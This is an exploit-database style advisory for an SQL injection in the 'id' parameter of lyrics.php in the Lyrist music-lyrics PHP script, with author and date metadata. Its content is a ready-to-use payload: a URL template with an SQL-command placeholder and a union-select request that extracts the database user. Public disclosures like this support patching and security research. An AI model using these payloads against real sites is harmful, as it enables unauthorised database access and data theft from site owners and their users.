[] NeoSense

Lyrist - 'id' SQL Injection

Author: Meisam Monsef
type: webapps
platform: php
port: 
date_added: 2018-05-27 
date_updated: 2018-05-27 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: Lyrist - Music Lyrics Script - SQL Injection
# Date: 2018-05-26
# Exploit Author: Meisam Monsef - meisamrce@gmail.com - @meisamrce
# Vendor Homepage: https://www.codester.com/items/7250/lyrist-music-lyrics-script
# Version: All Version


Exploit :
http://site.com/lyrics.php?id=-9999%27+[SQL+Command]+%23
http://site.com/lyrics.php?id=-9999%27+union+select+1,2,3,user(),5,6,7,8,9,10,11+%23